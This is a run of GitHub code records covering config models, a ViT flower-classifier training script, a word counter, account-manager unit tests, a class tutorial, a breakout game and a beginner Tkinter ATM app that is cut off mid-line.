\"\"\"Check that the account is present in the global accounts table.\"\"\"\n if isinstance(value, submanager.models.utils.MissingAccount):\n raise ValueError(\n f\"Account key '{value}' not listed in accounts table\",\n )\n return value\n\n\nclass ItemWithContextConfig(ItemConfig, metaclass=abc.ABCMeta):\n \"\"\"Base class reprisenting a config item that has a Reddit context.\"\"\"\n\n context: ContextConfig\n\n\nclass DynamicItemConfig(CustomMutableBaseModel, metaclass=abc.ABCMeta):\n \"\"\"Base class for the dynamic configuration of a generic item.\"\"\"\n\n\nclass ManagerConfig(CustomBaseModel, metaclass=abc.ABCMeta):\n \"\"\"Base class for manager modules.\"\"\"\n\n enabled: bool = True\n\n\nclass ItemManagerConfig(ManagerConfig, metaclass=abc.ABCMeta):\n \"\"\"Base class for managers that deal with arbitrary discrete items.\"\"\"\n\n items: Mapping[StripStr, ItemConfig] = {}\n\n\nclass DynamicItemManagerConfig(CustomMutableBaseModel, metaclass=abc.ABCMeta):\n \"\"\"Base class for dynamic config for ItemManagers.\"\"\"\n\n items: Mapping[StripStr, DynamicItemConfig] = {}\n","repo_name":"r-spacex/submanager","sub_path":"src/submanager/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"74673582480","text":"# import package \nimport PIL\nfrom PIL import Image, ImageFile\nimport PIL.ImageOps\nimport PIL.ImageEnhance\nimport PIL.ImageDraw\nimport torch\nfrom torch import optim\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nfrom torchvision import transforms\nfrom torchvision.datasets import ImageFolder\nimport random\nimport math\nimport numpy as np\nimport pandas as pd\nimport torchvision\nimport matplotlib.pyplot as plt\nimport opendatasets as od\nfrom torchsummary import summary\nfrom functools import partial\nimport timm\nfrom timm.models.vision_transformer import VisionTransformer, _cfg\nfrom timm.loss import LabelSmoothingCrossEntropy\nfrom timm.models.layers import trunc_normal_\nfrom timm.data.mixup import Mixup\nfrom timm.data.auto_augment import rand_augment_transform\nfrom timm.data.transforms import RandomResizedCropAndInterpolation\nfrom torchvision.transforms import InterpolationMode\nfrom timm.scheduler import CosineLRScheduler\nfrom tqdm import tqdm \nfrom sklearn.model_selection import train_test_split\n\n# %%\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\nnum_classes = 219\n\n\n# %%\n\n\n# hyperparameter\nbatch_size = 64\n\nepochs = 200\n\nlr = 0.0001\nwarmup_epoch = 5\n\n\n# %%\n\n\nrand_aug = rand_augment_transform(\n config_str=\"rand-m9-mstd0.5-inc1\",\n hparams=dict(\n translate_const=int(224 * 0.45),\n img_mean=tuple([min(255, round(255 * x)) for x in (0.5071, 0.4867, 0.4408)]),\n )\n)\n\n\n# %%\n\n\n# Use when training, don't put it in transforms\nmixup_args = {\n 'mixup_alpha': 0.3,\n 'cutmix_alpha': 0.4,\n 'cutmix_minmax': None,\n 'prob': 0.7,\n 'switch_prob': 0.,\n 'mode': 'batch',\n 'label_smoothing': 0,\n 'num_classes': num_classes\n }\nmixup_cutmix = Mixup(\n **mixup_args\n)\n\n\n# %%\n\n\n# Create transforms\nstats = (0.485, 0.456, 0.406), (0.229, 0.224, 0.225)\n\nMEAN = (0.485, 0.456, 0.406)\nSTD = (0.229, 0.224, 0.225)\n\nrandom_transform = RandomResizedCropAndInterpolation(size=224, scale=(0.8, 1.0))\nrandom_transform.interpolation = InterpolationMode.BILINEAR\n\ntrain_tfms = transforms.Compose([\n random_transform,\n rand_aug,\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(*stats),\n])\n\ntest_tfms = transforms.Compose([\n transforms.Resize([224, 224]),\n transforms.ToTensor(),\n transforms.Normalize(*stats)\n])\n\n\n# %%\n\nclass FlowerDataset(Dataset):\n def __init__(self, root=\"comp_orchid\", label_file=\"comp_orchid/label.csv\", transform=None, **kwargs):\n self.root = root\n \n if isinstance(label_file, str):\n self.data = pd.read_csv(label_file)\n else:\n self.data = label_file\n \n if transform is not None:\n self.transform = transform\n else:\n normalize = transforms.Normalize(\n mean=MEAN,\n std=STD\n )\n self.transform = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize\n ]) \n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, idx):\n label = self.data.iloc[idx, 1]\n \n img_path = self.data.iloc[idx, 0]\n img = Image.open(f\"{self.root}/{img_path}\").convert(\"RGB\")\n \n img = self.transform(img)\n \n return img, label\n \n \ndef split_train_test(label_file):\n data = pd.read_csv(label_file)\n unique_cls = np.unique(data.iloc[:, 1])\n \n eval_idx = []\n for cls in unique_cls:\n eval_idx.extend((data[data.iloc[:, 1] == cls].sample(n=1, random_state=0).index).tolist())\n\n train_file = data[~data.index.isin(eval_idx)]\n test_file = data[data.index.isin(eval_idx)]\n \n return train_file.reset_index(drop=True), test_file.reset_index(drop=True) \n\n\ndef make_loader(batch_size, img_root, label_file=None,\n shuffle=True, transform=None, drop_last=False,\n num_workers=2, pin_memory=True):\n dataset = FlowerDataset(root=img_root, label_file=label_file, transform=transform)\n dataloader = DataLoader(\n dataset, batch_size=batch_size, pin_memory=pin_memory,\n shuffle=shuffle, drop_last=drop_last, num_workers=num_workers\n )\n return dataloader\n\n\ntrain_csv, test_csv = split_train_test(\"./comp_orchid/label.csv\")\n\n# %%\n\n\n# Create Dataloder\ntrain_loader = make_loader(batch_size=batch_size, \n img_root=\"./comp_orchid\",\n shuffle=True, \n transform=train_tfms,\n label_file=train_csv)\n\ntest_loader = make_loader(batch_size=batch_size,\n img_root=\"./comp_orchid\",\n shuffle=False,\n transform=test_tfms,\n label_file=test_csv)\n\n\n# %%\n\n\n# Create device\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\n# %%\nclass mymodel(nn.Module):\n def __init__(self):\n super().__init__()\n self.vit = timm.create_model('vit_base_patch16_224_in21k', pretrained=True, num_classes = num_classes)\n def forward(self, x):\n x = self.vit(x)\n return x\n\n# model = deit_tiny_patch16_224(pretrained=True).to(device)\n\n# model = nn.Sequential(nn.Upsample(size=(224,224), mode='bilinear'), model)\n# model = \nmodel = mymodel()\n\n# %%\n# model.head = nn.Linear(192, num_classes)\n\n\n# %%\n\n\nprint(model)\n\n\n# %%\n\n\nmodel = model.to(device)\n\n# model = torch.nn.DataParallel(model)\n# %%\n\n\ndef adjust_learning_rate(optimizer, epoch):\n learn_rate = lr\n if epoch < warmup_epoch:\n learn_rate = learn_rate / (warmup_epoch - epoch)\n else:\n learn_rate *= 0.5 * (1. + math.cos(math.pi * (epoch - warmup_epoch) / (epochs - warmup_epoch)))\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = learn_rate\n\n\n# %%\n\n\noptimizer = torch.optim.AdamW(model.parameters(), lr=lr)\n# optimizer = torch.optim.SGD(model.parameters(), momentum=0.9, lr=lr)\n\ncriterion = nn.CrossEntropyLoss()\n\n\n# %%\n\n\nnoise_args = dict(\n noise_range_t=None,\n noise_pct=0.67,\n noise_std=1.,\n noise_seed=42\n)\n\nlr_scheduler = CosineLRScheduler(\n optimizer,\n t_initial=epochs,\n t_mul=1.0,\n lr_min=1e-5,\n decay_rate=0.1,\n warmup_lr_init=5e-5,\n warmup_t=3,\n cycle_limit=1,\n t_in_epochs=True,\n **noise_args,\n)\n\n# %%\n\n\ndef get_lr_per_epoch(scheduler, num_epoch):\n lr_per_epoch = []\n for epoch in range(num_epoch):\n lr_per_epoch.append(scheduler.get_epoch_values(epoch))\n return lr_per_epoch\n\nlr_per_epoch = get_lr_per_epoch(lr_scheduler, epochs)\nplt.plot([i for i in range(epochs)], lr_per_epoch, label=\"With warmup\");\n\n\ntest_scheduler = CosineLRScheduler(optimizer, t_initial=epochs)\nlr_per_epoch = get_lr_per_epoch(test_scheduler, epochs)\nplt.plot([i for i in range(epochs)], lr_per_epoch, label=\"Without warmup\", alpha=0.8)\n\nplt.legend()\n\n\n# %%\n\n\ntotal_train_loss_history = []\ntrain_accuracy_history = []\ntotal_test_loss_history = []\ntest_accuracy_history = []\nbest_accuracy = 0\n\n\n# %%\n\n\nfor epoch in range(epochs):\n total_train_loss = 0\n train_accuracy = 0\n total_test_loss = 0\n test_accuracy = 0\n\n steps = 0\n total_steps = len(train_loader)\n model.train()\n adjust_learning_rate(optimizer, epoch)\n num_updates = (epoch) * len(train_loader)\n for image, label in tqdm(train_loader):\n steps += 1\n image = image.to(device)\n label = label.to(device)\n \n# image, label = mixup_cutmix(image, label)\n\n output = model(image)\n# label = label.argmax(-1)\n \n optimizer.zero_grad()\n train_loss = criterion(output, label)\n train_loss.backward()\n # nn.utils.clip_grad_norm_(model.parameters(), 5)\n optimizer.step()\n\n total_train_loss += train_loss.item() \n prediction = output.argmax(-1) == label\n train_accuracy += prediction.sum().item() / label.size(0)\n\n # lr_scheduler.step_update(num_updates, None)\n\n # lr_scheduler.step(epoch + 1, None)\n\n model.eval()\n with torch.no_grad():\n for test_image, test_label in test_loader:\n test_image = test_image.to(device)\n test_label = test_label.to(device)\n \n test_output = model(test_image)\n test_loss = criterion(test_output, test_label)\n \n total_test_loss += test_loss.item()\n test_prediction = test_output.argmax(-1) == test_label\n test_accuracy += test_prediction.sum().item() / test_label.size(0)\n\n total_train_loss_history.append(total_train_loss / len(train_loader))\n total_test_loss_history.append(total_test_loss / len(test_loader))\n train_accuracy_history.append(train_accuracy / len(train_loader) * 100)\n test_accuracy_history.append(test_accuracy / len(test_loader) * 100)\n\n print(\"Epoch {}\".format(epoch+1))\n print(\"Train loss : {}\".format(total_train_loss / len(train_loader)))\n print(\"Test loss : {}\".format(total_test_loss / len(test_loader)))\n print(\"Train accuracy : {}\".format(train_accuracy / len(train_loader) * 100))\n print(\"Test accuracy : {}\".format(test_accuracy / len(test_loader) * 100))\n if test_accuracy / len(test_loader) * 100 > best_accuracy:\n best_accuracy = test_accuracy / len(test_loader) * 100\n torch.save(model.state_dict(), \"./vit_base_patch16_224_in21k.pth\")\n print(\"Save model\")\n print(\"=================================================\")\n\n\n# %%\n\n\n# Plot loss and accuracy\nfig = plt.figure(figsize=(15, 6)) \nsub1 = fig.add_subplot(1, 2, 1) \nsub2 = fig.add_subplot(1, 2, 2) \n\n\nsub1.set_xlabel(\"Epochs\")\nsub1.set_ylabel(\"Accuracy %\")\n\nsub1.plot(train_accuracy_history, color=\"green\", label=\"Training ACC\")\nsub1.plot(test_accuracy_history, color=\"orange\", label=\"Test ACC\")\nsub1.legend(loc=4)\n\nsub2.set_xlabel(\"Epochs\")\nsub2.set_ylabel(\"Loss\")\n\nsub2.plot(total_train_loss_history, color=\"green\", label=\"Training Loss\")\nsub2.plot(total_test_loss_history, color=\"orange\", label=\"Test Loss\")\nsub2.legend(loc=1)\n\nplt.savefig('vit_base_patch16_224_in21k.png')\n\n\n# %%\n\n# Load weight with best accuracy\nmodel.load_state_dict(torch.load(\"./vit_base_patch16_224_in21k.pth\"))\n\n\n# %%\n\n\n# fixed testing process\ncorrect = 0\ntotal = 0\n# since we're not training, we don't need to calculate the gradients for our outputs\nwith torch.no_grad():\n for data in test_loader:\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n # calculate outputs by running images through the network\n outputs = model(images)\n # the class with the highest energy is what we choose as prediction\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\nprint(f'Accuracy of the network on the 10000 test images: {100 * correct / total:.2f} %')\n\n\n","repo_name":"JoyPang123/flower-compeition","sub_path":"vit_no_ssl.py","file_name":"vit_no_ssl.py","file_ext":"py","file_size_in_byte":11068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3807300138","text":"name = input(\"File name:\")\ntry:\n rfile = open(name)\nexcept:\n print(\"Wrong file name!\")\n quit()\nwords = dict()\n\nfor str in rfile:\n str = str.rstrip()\n splited = str.split()\n\n if (len(splited) == 0): continue\n for word in splited:\n if (word in words):\n words[word] += 1\n else: \n words[word] = 1\n # words[word] = words.get(word, 0) + 1\n\nmostBigWord = None\nmostBigCount = 0\n\nfor word, count in words.items():\n if (mostBigWord is None and mostBigCount == 0):\n mostBigWord = word\n mostBigCount = count\n \n if (count > mostBigCount):\n mostBigWord = word\n mostBigCount = count\n\nprint(\"MostBigWord:\", mostBigWord, \"MostBigCount:\", mostBigCount)","repo_name":"Kyeong1024/python_practice","sub_path":"chapter9.py","file_name":"chapter9.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29183547027","text":"from infra.qyp.account_manager.src.action.list_user_accounts import (set_personal_limits, set_personal_usage,\n cast_yp_resources\n )\n\nfrom infra.qyp.proto_lib import vmset_pb2\nimport mock\nimport yp.data_model as data_model\nfrom yt_yson_bindings import dumps_proto\n\n\ndef test_set_personal_limits():\n lim = vmset_pb2.ResourceTotals()\n q = {\n 'mem': 1024, 'cpu': 1000, 'segment': 'dev', 'internet_address': 0,\n 'disk': [\n {'storage': 'ssd', 'bandwidth_guarantee': 0, 'capacity': 322122547200},\n {'storage': 'hdd', 'bandwidth_guarantee': 222, 'capacity': 111}\n ]\n }\n set_personal_limits(lim, q)\n assert lim.per_segment['dev'].mem == q['mem']\n assert lim.per_segment['dev'].cpu == q['cpu']\n assert lim.per_segment['dev'].cpu == q['cpu']\n assert lim.per_segment['dev'].cpu == q['cpu']\n lim.per_segment['dev'].disk_per_storage['ssd'] = q['disk'][0]['capacity']\n lim.per_segment['dev'].disk_per_storage['hdd'] = q['disk'][1]['capacity']\n\n\ndef test_set_personal_usage(pod_client_mock):\n spec1 = data_model.TPodSpec()\n spec1.resource_requests.vcpu_guarantee = 100\n spec1.resource_requests.memory_guarantee = 256\n gpu1 = spec1.gpu_requests.add()\n gpu1.model = 'model1'\n gpu1.id = 'gpuid1'\n gpu2 = spec1.gpu_requests.add()\n gpu2.model = 'model1'\n gpu2.id = 'gpuid2'\n d = spec1.disk_volume_requests.add()\n d.id = 'test_id'\n d.storage_class = 'ssd'\n d.quota_policy.capacity = 128\n spec2 = data_model.TPodSpec()\n spec2.resource_requests.vcpu_guarantee = 128\n spec2.resource_requests.memory_guarantee = 256\n\n pods_result = mock.Mock()\n val1 = mock.Mock()\n val1.values = [dumps_proto(spec1)]\n val2 = mock.Mock()\n val2.values = [dumps_proto(spec2)]\n pods_result.results = [val1, val2]\n pod_client_mock.get_pods.return_value = pods_result\n usage = vmset_pb2.ResourceTotals()\n set_personal_usage(pod_client_mock, usage, {'dev': ['test_id'], 'gpu_dev': ['test_id']})\n assert usage.per_segment['dev'].cpu == 228\n assert usage.per_segment['dev'].mem == 512\n assert usage.per_segment['dev'].disk_per_storage['ssd'] == 128\n assert usage.per_segment['dev'].internet_address == 0\n assert usage.per_segment['dev'].gpu_per_model['model1'] == 2\n assert usage.per_segment['gpu_dev'].cpu == 228\n assert usage.per_segment['gpu_dev'].mem == 512\n assert usage.per_segment['gpu_dev'].disk_per_storage['ssd'] == 128\n assert usage.per_segment['gpu_dev'].internet_address == 0\n assert usage.per_segment['gpu_dev'].internet_address == 0\n assert usage.per_segment['gpu_dev'].gpu_per_model['model1'] == 2\n\n\ndef test_cast_yp_resources():\n pb = vmset_pb2.ResourceInfo()\n r = data_model.TPerSegmentResourceTotals()\n r.memory.capacity = 64\n r.cpu.capacity = 100\n r.disk_per_storage_class['ssd'].capacity = 256\n r.disk_per_storage_class['ssd'].bandwidth = 14\n r.network.bandwidth = 8\n\n cast_yp_resources(pb, r)\n assert pb.mem == 64\n assert pb.cpu == 100\n assert pb.disk_per_storage['ssd'] == 256\n assert pb.io_guarantees_per_storage['ssd'] == 14\n assert pb.network_guarantee == 8\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/test_list_user_accounts_action.py","file_name":"test_list_user_accounts_action.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3863486330","text":"class User:\n #pass # can leave the class empty if you just want to declare it and not define it, use pass keyword\n # classes use PascalCase (EveryNewWord's starting letter should be Caps)\n # camelCase\n # snake_case\n #constructor: special function known by python and it is known because it has two underscores at the starting of it and the ending of it\n # def __init__(self): self is the actual object that is being created or being initialized.\n # in addition to self you can pass as many parameters as you want and that parameter is\n # going to be passed in when an object gets constructed from this class.\n # once you recieve this data you can use it to set the object's attributes\n #initialize attributes\n def __init__(self, user_id, username):\n self.id = user_id\n self.username = username\n self.followers = 0\n self.following = 0\n print(\"new user being created...\")\n\n def follow(self, user): #unlike a function, a method always needs to have a self parameter as the first parameter\n user.followers += 1 #this means that when this method is called, it knows the object that called it.\n self.following += 1\n\nuser_1 = User(\"001\", \"tanish\")\nprint(user_1.username)\nprint(user_1.id)\nprint(user_1.followers)\n\nuser_2 = User(\"002\", \"muskan\")\n\nuser_1.follow(user_2)\nprint(user_1.followers)\nprint(user_1.following)\nprint(user_2.followers)\nprint(user_2.following)\n","repo_name":"Tanish57/Python","sub_path":"Day17/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11112180912","text":"# This is a simple game run on Easel Python Game Engine. It is served as a tutorial of how to creat a game using Easel_PY\n# Author: Qianji Zheng, Texas Tech Univeristy\n# Date Created: 2/21/2015\n# Date Last Modified: 2/21/2015\n#\n\n# This is a simpified version of breakout game. The game is played on a 1000*700 pixels window. There are a ball, a bat and an empty wall in the game.\n# The wall is 800*600. The ball is a 17*17 image. The bat is a 80*12 image.\n# When the game starts, the bar is placed 200 pixel above the bottom of the wall and the ball is placed right on top the bat. The ball starts bouncing off to up-right \n# with speed (7,7). When the ball hits the right of the wall, it bonces to the left-up, in otherwords, the speed is (-7,7). If the ball hits the top of the wall,\n# its speed is (-7,-7).\n# When the ball hits the wall or the bat, it bounces off. When the bat miss the ball, the game is over. The player hold down \"a\" or \"d\" to move the bat to the left or right.\n# When the ball hits the bat, the speed of the ball increase.\n\n\n# EaselLib must be imported before writing any user defined functions\nfrom EaselLib import *\n\n# define a 1000*700 window for the game\ndef windowDimensions():\n return(1280,768)\n\n# define the frame rate of the game, the bigger the value the faster the game will be\ndef frameRate():\n return 20\n\n# init() is a procedure that initializes the program state and loads any sound and/or image files. init() must declare as global all the variables it sets\ndef init():\n global BALL,BAT,BALL_IMG,BAT_IMG,BALL_POS, BAT_POS,BAT_SPEED,BALL_SPEED,RED, WALL,GAME_STATUS,SCORE\n # define the color red\n RED = (255,0,0)\n\n # load the bat in the sub_folder in \"media\". The bat is a 80*12 image file\n BAT_IMG = loadImageFile(\"bat.png\")\n # define the initial position of the bar. \n BAT_POS = (-40,-200)\n # define the speed of the bat. Whenever the player move the bat, the position of the bat is based on the speed of the bar and its previous position\n BAT_SPEED = 20\n BAT = fileImg(BAT_IMG,BAT_POS)\n\n # load the ball image, which is 17 * 17 pixel\n BALL_IMG =loadImageFile(\"ball.png\")\n # define the initial position of the ball. The ball is placed 1 pixel above the top of the bat\n BALL_POS = (0,-200+17+1)\n # define the speed of the ball, the 1st coordinate is x speed and 2nd is y speed\n BALL_SPEED = (7,7)\n BALL = fileImg(BALL_IMG,BALL_POS)\n\n # Draw the wall using segments\n WALL = wall();\n\n GAME_STATUS = \"init\"\n # play the background music infinitly\n #playBackGroundMusic(\"house_lo.wav\")\n SCORE = 0\n\n# wall() is a list of segments [left,top,right,bottom] in red, which are the left, top, right and bottom segment of the wall respetively\ndef wall():\n lt = (-400,300)\n rt = (400,300)\n lb = (-400,-300)\n rb = (400,-300)\n left = seg(lt,lb,RED)\n top = seg(lt,rt,RED)\n right = seg(rt,rb,RED)\n bottom = seg(lb,rb,RED)\n return [left,top,right,bottom]\n\n# takes no parameters and returns a sprite consisting of the images to be displayed in the current frame. Display may read the global variables from init and update.\ndef display():\n if GAME_STATUS==\"over\":\n return gameOverImg() + staticImage()\n return [BALL,BAT] + staticImage()\n\n# update() is a procedure that updates the game state variables. update() must declare as global the variables it changes.\ndef update():\n global BALL, BAT, BALL_POS,BALL_SPEED,BALL_IMG,BAT_POS, GAME_STATUS,SCORE\n\n # update game over\n if clicked():\n playSound(CLICK)\n init()\n GAME_STATUS = \"play\"\n if gameOver():\n GAME_STATUS =\"over\"\n # reset ball position\n BALL_POS = (0,-200+17+1)\n playSound(BOING)\n return\n if GAME_STATUS==\"over\":\n return\n if GAME_STATUS ==\"init\" and not clicked():\n return\n\n pos_x,pos_y = BALL_POS\n speed_x, speed_y = BALL_SPEED\n\n # check if the ball hits the left or right boundary of the wall\n if pos_x >400-17 or pos_x < -400+3:\n # reverse the x speed\n speed_x = -speed_x\n playSound(BANG)\n # check if the ball hits the top or bottom boundary of the wall\n if pos_y > 300-4 or pos_y <-300+17:\n #reverse the y speed\n speed_y = -speed_y\n playSound(BANG)\n # bounce the wall and update speed\n BALL_SPEED = speed_x,speed_y\n\n # update bat\n bat_pos_x, bat_pos_y = BAT_POS\n # if \"d\" is down then move the bat to the right\n if K_d in keysDown:\n bat_pos_x += BAT_SPEED\n # if \"a\" is down then move the bat to the left\n if K_a in keysDown:\n bat_pos_x -=BAT_SPEED\n # prevent the bat from moving throught the wall when it hits the right of the wall\n if bat_pos_x >=400-80:\n bat_pos_x = 400-80\n # prevent the bat from moving throught the wall when it hits the left of the wall\n if bat_pos_x <=-400:\n bat_pos_x = -400\n # update bat position\n BAT_POS = bat_pos_x,bat_pos_y\n BAT = fileImg(BAT_IMG,BAT_POS)\n\n # if the ball collides with the bat then bounce the ball and update the ball speed and postion\n # whenever the ball hits the bat, both x speed and y speed increase by 2 and play the collission sound DING\n if isCollided():\n SCORE+=1\n # reverse y speed\n speed_y = -speed_y\n # increase x speed by 2\n if speed_x >0:\n speed_x+=2\n else:\n speed_x-=2\n # increase y speed by 2\n if speed_y>0:\n speed_y+=2\n else:\n speed_y-=2\n\n playSound(DING)\n BALL_SPEED = speed_x,speed_y\n\n # bounce and update ball position\n pos_x += BALL_SPEED[0]\n pos_y += BALL_SPEED[1]\n # update ball position\n BALL_POS = (pos_x,pos_y)\n BALL = fileImg(BALL_IMG,BALL_POS)\n\n\n# isCollided() iff the ball collides with the bat in the current game\ndef isCollided():\n return BAT_POS[1]-12<BALL_POS[1]<BAT_POS[1] + 17 and BAT_POS[0]-17<BALL_POS[0]<BAT_POS[0]+80\n\n# gameOver() iff the ball is below the bat\ndef gameOver():\n return BALL_POS[1] < BAT_POS[1]-24\n\ndef gameOverImg():\n message = txt(\"GAME OVER\",(0,0),50,RED)\n return [message]\n\n# clicked() iff the mouse is in the start button area and the left button of the mouse is pressed\ndef clicked():\n return -550<mouseX<-450 and 0<mouseY<50 and mouseDown and not oldMouseDown\n\n# display the start button. The rectangle button consists of two filled triangles and a message inside the rectangle\ndef startButton():\n # left top point of the rectangle\n lt = (-550,0)\n # right top point of the rectangle\n rt = (-450,0)\n # left bottom point of the rectangle\n lb = (-550,50)\n # right bottom point of the rectangle\n rb = (-450,50)\n # upper filled triangle in red\n t1 = ftri(lt,rt,rb,RED)\n # bottom filled triangle in red\n t2 = ftri(lt,lb,rb,RED)\n black = (0,0,0)\n text = \"Start\"\n if GAME_STATUS ==\"over\":\n text =\"Restart\"\n message = txt(text,(-500,25),30,black)\n return [t1,t2,message]\n\n# display the message of how to play the game\ndef howToPlay():\n blue = (0,0,255)\n start = txt(\"click 'Start' button on the right to start the game\",(0,375),20,blue)\n move_left = txt(\"press or hold down 'a' on the keyboard to move the bat to the left\",(0,355),20,blue)\n move_right = txt (\"press or hold down 'd' on the keyboard to move the bat to the right\",(0,335),20,blue)\n return [start,move_left,move_right]\n\n# display the wall boundary, start button and the message of how to play the game\ndef staticImage():\n return wall() + startButton() + howToPlay() + score()\n\n# display score in the current game\ndef score():\n orange = (255,128,0)\n green = (0,255,0)\n center = (-450,-100)\n # define a green circle in green, whose center is (-450,-100)\n circle = circ(center,30,green)\n # the value representing the score inthe current game\n value = txt(str(SCORE),center,30,orange)\n \n score = txt(\"Score:\",(-525,-100),30,orange)\n return [score,circle,value]\n","repo_name":"qianji/Easel_PY","sub_path":"tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"27526437170","text":"#Bank ATM\r\n#created by github.com/rajatbhatia1998\r\n#Account Number : 10 ------------ Password : trial\r\n\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nimport sqlite3\r\n\r\n\r\nARIAL = (\"arial\",10,\"bold\")\r\n\r\nclass Bank:\r\n def __init__(self,root):\r\n self.conn = sqlite3.connect(\"atm_databse.db\", timeout=100)\r\n self.login = False\r\n self.root = root\r\n self.header = Label(self.root,text=\"R~R BANK\",bg=\"#50A8B0\",fg=\"white\",font=(\"arial\",20,\"bold\"))\r\n self.header.pack(fill=X)\r\n self.frame = Frame(self.root,bg=\"#728B8E\",width=600,height=400)\r\n #Login Page Form Components\r\n self.userlabel =Label(self.frame,text=\"Account Number\",bg=\"#728B8E\",fg=\"white\",font=ARIAL)\r\n self.uentry = Entry(self.frame,bg=\"honeydew\",highlightcolor=\"#50A8B0\",\r\n highlightthickness=2,\r\n highlightbackground=\"white\")\r\n self.plabel = Label(self.frame, text=\"Password\",bg=\"#728B8E\",fg=\"white\",font=ARIAL)\r\n self.pentry = Entry(self.frame,bg=\"honeydew\",show=\"*\",highlightcolor=\"#50A8B0\",\r\n highlightthickness=2,\r\n highlightbackground=\"white\")\r\n self.button = Button(self.frame,text=\"LOGIN\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command=self.verify)\r\n self.q = Button(self.frame,text=\"Quit\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command = self.root.destroy)\r\n self.userlabel.place(x=145,y=100,width=120,height=20)\r\n self.uentry.place(x=153,y=130,width=200,height=20)\r\n self.plabel.place(x=125,y=160,width=120,height=20)\r\n self.pentry.place(x=153,y=190,width=200,height=20)\r\n self.button.place(x=155,y=230,width=120,height=20)\r\n self.q.place(x=480,y=360,width=120,height=20)\r\n\r\n\r\n self.frame.pack()\r\n def database_fetch(self):#Fetching Account data from database\r\n self.acc_list = []\r\n self.temp = self.conn.execute(\"select name,pass,acc_no,acc_type,bal from atm where acc_no = ? \",(self.ac,))\r\n for i in self.temp:\r\n self.acc_list.append(\"Name = {}\".format(i[0]))\r\n self.acc_list.append(\"Account no = {}\".format(i[2]))\r\n self.acc_list.append(\"Account type = {}\".format(i[3]))\r\n self.ac = i[2]\r\n self.acc_list.append(\"Balance = {}\".format(i[4]))\r\n\r\n def verify(self):#verifying of authorised user\r\n ac = False\r\n self.temp = self.conn.execute(\"select name,pass,acc_no,acc_type,bal from atm where acc_no = ? \", (int(self.uentry.get()),))\r\n for i in self.temp:\r\n self.ac = i[2]\r\n if i[2] == self.uentry.get():\r\n ac = True\r\n elif i[1] == self.pentry.get():\r\n ac = True\r\n m = \"{} Login SucessFull\".format(i[0])\r\n self.database_fetch()\r\n messagebox._show(\"Login Info\", m)\r\n self.frame.destroy()\r\n self.MainMenu()\r\n else:\r\n ac = True\r\n m = \" Login UnSucessFull ! Wrong Password\"\r\n messagebox._show(\"Login Info!\", m)\r\n\r\n if not ac:\r\n m = \" Wrong Acoount Number !\"\r\n messagebox._show(\"Login Info!\", m)\r\n\r\n\r\n def MainMenu(self):#Main App Appears after logined !\r\n self.frame = Frame(self.root,bg=\"#728B8E\",width=800,height=400)\r\n root.geometry(\"800x400\")\r\n self.detail = Button(self.frame,text=\"Account Details\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command=self.account_detail)\r\n self.enquiry = Button(self.frame, text=\"Balance Enquiry\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command= self.Balance)\r\n self.deposit = Button(self.frame, text=\"Deposit Money\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command=self.deposit_money)\r\n self.withdrawl = Button(self.frame, text=\"Withdrawl Money\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command=self.withdrawl_money)\r\n self.q = Button(self.frame, text=\"Quit\", bg=\"#50A8B0\", fg=\"white\", font=ARIAL, command=self.root.destroy)\r\n self.detail.place(x=0,y=0,width=200,height=50)\r\n self.enquiry.place(x=0, y=315, width=200, height=50)\r\n self.deposit.place(x=600, y=0, width=200, height=50)\r\n self.withdrawl.place(x=600, y=315, width=200, height=50)\r\n self.q.place(x=340, y=340, width=120, height=20)\r\n self.frame.pack()\r\n\r\n def account_detail(self):\r\n self.database_fetch()\r\n text = self.acc_list[0]+\"\\n\"+self.acc_list[1]+\"\\n\"+self.acc_list[2]\r\n self.label = Label(self.frame,text=text,font=ARIAL)\r\n self.label.place(x=200,y=100,width=300,height=100)\r\n\r\n def Balance(self):\r\n self.database_fetch()\r\n self.label = Label(self.frame, text=self.acc_list[3],font=ARIAL)\r\n self.label.place(x=200, y=100, width=300, height=100)\r\n\r\n def deposit_money(self):\r\n self.money_box = Entry(self.frame,bg=\"honeydew\",highlightcolor=\"#50A8B0\",\r\n highlightthickness=2,\r\n highlightbackground=\"white\")\r\n self.submitButton = Button(self.frame,text=\"Submit\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL)\r\n\r\n self.money_box.place(x=200,y=100,width=200,height=20)\r\n self.submitButton.place(x=445,y=100,width=55,height=20)\r\n self.submitButton.bind(\"<Button-1>\",self.deposit_trans)\r\n\r\n def deposit_trans(self,flag):\r\n self.label = Label(self.frame, 